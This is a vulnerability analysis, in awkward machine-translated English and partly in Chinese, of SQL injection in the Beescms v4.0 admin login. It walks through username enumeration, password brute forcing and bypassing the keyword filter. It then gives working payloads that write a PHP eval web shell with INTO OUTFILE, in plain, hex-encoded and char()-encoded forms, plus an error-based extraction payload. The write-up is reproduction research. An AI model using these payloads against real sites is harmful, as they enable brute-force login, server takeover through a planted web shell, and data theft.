Beescms_v4.0 sql injection vulnerability analysis
First, Vulnerability Description
Since Beescms v4.0 background login codes, and code design defects result in the presence of a defect protection bypass global protection SQL injection.
Second, the vulnerability environment to build
1, the official download Beescms v4.0, Download: http://beescms.com/cxxz.html
2, extract the compressed file, and then put the files on the root of the site phpstudy
3, browser access http://192.168.10.171/beescms/install, start the installation
4, has been the next step, the following interface, enter the account password database
5, successfully installed
6, mysql.ini modify and add the entry in [mysqld] at: secure_file_priv =, stored and then restart phpstudy, otherwise the file is written with mysql error.
Third, the vulnerability affects version
Beescms v4.0
Fourth, the vulnerability reproduction
1, browser access to back page http://192.168.10.171/beescms/admin/
2, any input a user name and password, see the prompt "The management user does not exist", you can enumerate user name, password and then blasting out of the enumerated username
3, burpsuit enumerate user names, you can see a design flaw vulnerability of the code, you can submit multiple times after a verified without refresh request, an attacker can eventually lead to fuzz (violence enumeration).
4, according to enumerated user name and password enumeration, enumeration can see a successful password
5, the input single quote the user name, given, indicating the presence sql injection vulnerability
6, see the source code and found that the use of f1_value function and f1_html function of the input user name and password filter
7, follow f1_value function, we found f1_value function key input has been filtered, you can see, almost common SQL keywords have been filtered out.
8, follow f1_html function, we found that the use of special symbols input function htmlspecialchars be materialized html escape, mainly for defense XSS vulnerabilities
9, Baidu search htmlspecialchars function, only to find that encodes double quotes at htmlspecialchars function by default, you can see cms use this version of the default parameter filtering process, there are loopholes in the introduction of a single quote here.
10, continue to browse the code, find login authentication function check_login
11, follow check_login function, found check_login function is to authenticate the user to verify the user name, and then verify the password is correct, there are loopholes where the validation logic.
12, hand-fuzzing
12.1 find union select manual testing and other keywords to be filtered
12.2 source through the above analysis, the method was found bypass
union => uni union on
select => selselectect
12.3, guess the number of fields in the SQL query solution, according to the following figure, it is determined that the number of fields of the SQL query statement 5
12.4 attempts through SQL injection getshell
12.4.1, write a word to the next target site root, payload as follows:
admin%27 un union ion selselectect 1,2,3,4,<?php @eval($_POST[cmd]);?> into outfile 'C:/phpStudy/WWW/beescms/shell.php'#
12.4.2 in burpsuit capture, edit and playback packet, suggest the following error, based on a returned packet can be seen due to the special function htmlspecialchars symbols inputted html materialized escape, there is into, outfile keyword is filter
12.4.3, manual testing bypass keyword filtering protection
outfile => outoutfilefile
into => in into
12.4.4、通过上面的分析,发现php函数htmlspecialchars()对输入中含有的特殊符号进行html实体化转义,导致不能写shell到目标服务器上。可以通过利用mysql注入的一个特性就可以达到注入效果(即对shell部分进行Hex编码),或者用mysql函数char()就可以绕过这里的限制。
方法一、Hex编码
1、 对shell部分进行编码
2、 写入shell的payload为:注意:记得在编码转换的时候前面加0x或者直接用unhex函数
unhex(3c3f70687020406576616c28245f504f53545b636d645d293b3f3e),但是本次实验用unhex函数一直失败
admin' uni union on selselectect null,null,null,null,0x3c3f70687020406576616c28245f504f53545b636d645d293b3f3e in into outoutfilefile 'C:/phpStudy/WWW/beescms/shell.php'#
3、burp修改数据包,成功写入shell
4、菜刀连接
方法二、使用char函数
1、mysql内置函数char()可以将里边的ascii码参数转换为字符串,使用python实现快速转换
2、构造payload,payload为:
admin' uni union on selselectect null,null,null,null,char(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 99, 109, 100, 93, 41, 59, 63, 62) in into outoutfilefile 'C:/phpStudy/WWW/beescms/cmd.php'#
3、burp修改数据包,成功写入shell
4、菜刀连接
后记:
1、经过测试,发现user字段除了存在布尔注入,还存在报错注入
2、构造payload,payload如下:
admin' a and nd extractvalue(1,concat(0x7e,(select user()),0x7e))#
---------------------------------------------------------------------------